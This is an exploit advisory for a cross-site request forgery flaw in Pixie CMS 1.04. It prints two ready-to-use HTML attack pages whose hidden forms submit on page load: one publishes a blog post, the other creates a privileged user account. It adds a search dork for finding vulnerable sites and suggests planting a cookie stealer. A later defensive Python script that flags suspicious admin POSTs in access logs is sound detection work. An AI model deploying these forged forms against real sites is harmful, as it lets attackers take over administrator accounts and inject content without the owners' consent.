
Pixie 1.04 Cross Site Request Forgery

28 Dec 2010 | Reported by Ali Raheem | Type: packetstorm | Source: packetstormsecurity.com

Pixie 1.04 suffers from a Cross Site Request Forgery vulnerability that allows an attacker to submit form data in the name of the admin to add blog posts or new users. It also presents a risk of a cookie stealer being included in a blog post.

Code
`Pixie 1.04 suffers from CSRF where form data can be submitted by the  
admin unwittingly, in this example to add a blog post or add a new user.  
  
It was not attempted but it is possible to include a cookie stealer in the  
blog post which a naive admin may view if it has a curious/innocent  
sounding name.  
  
Here are the samples:  
  
<html>  
<!--  
# Exploit Title: PiXie CMS v1.04 <= CSRF Add Post  
# Google Dork: allintext: "Pixie Powered"  
# Date: 28/12/2010  
# Author: Ali Raheem (AKA wolfmankurd)  
# Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip  
# Version: <=1.04  
# Tested on: Linux sheevaplug-debian 2.6.32-00007-g56678ec #1 PREEMPT  
Mon Feb 8 03:49:55 PST 2010 armv5tel GNU/Linux  
# Note: Replace SITE_AND_PATH  
Have a look at the form and set title, content, tags and Author to  
whatever you want.  
-->  
<head></head>  
<body onload='document.pwn.submit()'>  
<form accept-charset="UTF-8"  
action="http://SITE_AND_PATH/admin/?s=publish&m=dynamic&x=blog&page=1"  
method="post" name="pwn" id="form_addedit" class="form">  
<input type="hidden" name="table_name" value="pixie_dynamic_posts"/>  
<input type="hidden" class="form_text" name="post_id" value=""  
maxlength="11" />  
<input type="hidden" class="form_text" name="page_id" value="3"  
maxlength="11" />  
<input type="hidden" id="date" name="day" value="28">  
<input type="hidden" name="month" value="12">  
<input type="hidden" name="year" value="2010">  
<input type="hidden" class="form_text" name="time" value="16:06"  
size="5" maxlength="5" />  
<input type="hidden" class="form_text" name="title" id="title"  
value="PwnT" />  
<input type="hidden" name="content" id="content" cols="50" value="PwnT  
by CSRF">  
<input type="hidden" class="form_text" name="tags" id="tags" value="Hack"/>  
<input type="hidden" name="public" id="public" value="yes" />  
<input type="hidden" type="radio" name="comments" id="comments"  
value="yes" />  
<input type="hidden" class="form_text" name="author" value="AUTHOR"  
maxlength="64" />  
<input type="hidden" class="form_text" name="last_modified"  
value="20101228160628" />  
<input type="hidden" class="form_text" name="post_views" value=""  
maxlength="99" />  
<input type="hidden" class="form_text" name="post_slug" value=""  
maxlength="255" />  
<input type="hidden" name="submit_new" class="submit" value="Save"  
type="submit"/>  
</form>  
</body>  
</html>  
  
  
And  
  
  
<html>  
<!--  
# Exploit Title: PiXie CMS v1.04 <= CSRF Add Super User  
# Google Dork: allintext: "Pixie Powered"  
# Date: 28/12/2010  
# Author: Ali Raheem (AKA wolfmankurd)  
# Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip  
# Version: <=1.04  
# Tested on: Linux sheevaplug-debian 2.6.32-00007-g56678ec #1 PREEMPT  
Mon Feb 8 03:49:55 PST 2010 armv5tel GNU/Linux  
Note: Replace site and path,  
USERNAME no spaces,   
REALNAME with a name,  
EMAIL with a valid email you get login details  
-->  
<head></head>  
<body onload='document.pwn.submit()'>  
<form accept-charset="UTF-8"  
action="http://SITEANDPATH/admin/?s=settings&x=users" method="post"  
class="form" name="pwn">  
<input type="hidden" name="uname" id="uname" value="USERNAME"/>  
<!-- No Spaces!-->  
<input type="hidden" name="realname" id="realname" value="REALNAME"/>  
<input type="hidden" name="email" id="email" value="EMAIL"/>  
<!-- needs to be Valid-->  
<input type="hidden" name="user_new" value="Save"/>  
<input type="hidden" name="privilege" value="2" />  
</form>  
</body>  
</html>  
  
  
  
`
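
For defenders reviewing a Pixie site's logs, the following added example (not part of the original advisory or of Pixie) flags POSTs to the two admin actions used by the forms above when the Referer is missing or points at another host. A forged request arrives from the admin's own browser, so the client IP looks legitimate and the Referer is the distinguishing field. The combined log format, the function name `suspicious_admin_posts`, and the host `cms.example.test` are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# (s, x) query values of the two state-changing admin actions the PoC forms post to.
SENSITIVE = {("publish", "blog"), ("settings", "users")}

# Apache/nginx "combined" access-log format (assumed logging configuration).
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"'
)

def suspicious_admin_posts(lines, site_host):
    """Return (timestamp, ip, target, referer) for sensitive admin POSTs
    whose Referer is absent or names a host other than site_host."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m or m["method"] != "POST":
            continue
        url = urlsplit(m["target"])
        if not url.path.rstrip("/").endswith("/admin"):
            continue
        query = parse_qs(url.query)
        action = (query.get("s", [""])[0], query.get("x", [""])[0])
        if action not in SENSITIVE:
            continue
        # hostname is None for "-" or an empty Referer; that is reported too,
        # although privacy settings can strip the header on legitimate requests.
        if urlsplit(m["referer"]).hostname != site_host.lower():
            hits.append((m["ts"], m["ip"], m["target"], m["referer"]))
    return hits

# Constructed sample log lines; hosts and addresses are documentation placeholders.
SAMPLE = [
    '192.0.2.10 - - [28/Dec/2010:16:01:02 +0000] "POST /admin/?s=settings&x=users HTTP/1.1" 200 734 "http://cms.example.test/admin/?s=settings&x=users" "Mozilla/5.0"',
    '192.0.2.10 - - [28/Dec/2010:16:06:28 +0000] "POST /admin/?s=settings&x=users HTTP/1.1" 200 734 "http://other.example.net/page.html" "Mozilla/5.0"',
    '192.0.2.10 - - [28/Dec/2010:16:06:30 +0000] "POST /admin/?s=publish&m=dynamic&x=blog&page=1 HTTP/1.1" 200 912 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [28/Dec/2010:16:07:00 +0000] "GET /admin/?s=publish&m=dynamic&x=blog&page=1 HTTP/1.1" 200 4096 "http://other.example.net/page.html" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_admin_posts(SAMPLE, "cms.example.test"):
        print(hit)
```

A hit on the `settings`/`users` action is worth following up by checking the user list for accounts the admin did not create.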
